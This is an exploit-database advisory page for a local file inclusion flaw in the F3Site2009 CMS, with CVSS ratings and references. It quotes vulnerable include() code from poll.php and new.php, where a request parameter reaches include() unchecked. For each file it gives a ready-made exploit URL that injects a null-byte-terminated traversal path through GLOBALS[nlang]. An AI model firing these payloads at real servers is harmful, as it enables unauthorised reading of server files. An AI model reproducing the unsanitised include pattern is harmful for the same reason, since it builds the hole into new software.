F3Site2009 Multiple LFI Exploit

2009.12.30
Credit: cr4wl3r
Risk: High
Local: No
Remote: Yes
CWE: CWE-22


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

################################################################## ## Exploit Title: F3Site2009 Multiple LFI Exploit ## ## Date: 18-12-2009 ## ## Author: cr4wl3r ## ## Software Link: http://code.google.com/p/f3site/ ## ## Version: N/A ## ## Tested on: GNU/LINUX ## ################################################################## ~ Code [poll.php] : if(file_exists('./cache/poll_'.$GLOBALS['nlang'].'.php')): include('./cache/poll_'.$GLOBALS['nlang'].'.php'); ~ 3xplo!t : [F3Site2009_path]/mod/poll.php?GLOBALS[nlang]=[LFI%00] ~ Code [new.php] : if(file_exists('./cache/new-'.$GLOBALS['nlang'].'.php')) { include './cache/new-'.$GLOBALS['nlang'].'.php'; } ~ 3xplo!t : [F3Site2009_path]/mod/new.php?GLOBALS[nlang]=[LFI%00]

References:

http://xforce.iss.net/xforce/xfdb/54908
http://www.securityfocus.com/bid/37408
http://www.exploit-db.com/exploits/10536
http://packetstormsecurity.org/0912-exploits/f3site2009-lfi.txt


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top